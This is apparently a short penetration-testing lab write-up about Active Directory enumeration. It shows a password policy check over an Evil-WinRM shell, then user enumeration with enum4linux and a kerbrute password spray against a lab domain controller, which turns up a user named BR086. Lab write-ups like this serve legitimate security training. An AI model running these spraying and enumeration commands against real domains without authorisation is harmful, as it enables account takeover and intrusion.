Enum

I tried running net.exe commands but most of them fail due to the lack of privilege.

But we know that there is a user with a weak password. So our goal is first enumerate the usernames and then perform a password spray attack. But first we need to check the password policy so we don't get our accounts locked out.

*Evil-WinRM* PS C:\Users\AB920\Documents> net accounts
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          42
Minimum password length:                              1
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        SERVER
The command completed successfully.

As we can see there is no lockout. So now we enumerate the users:

enum4linux -U -u $username -p $password 172.16.7.3  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]" > usernames.txt

With this usernames list now we can do password spray:

kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 usernames.txt pass_list.txt

We got a user named BR086.

PreviousFoothold NextCredentials obtained

Last updated 1 year ago

Was this helpful?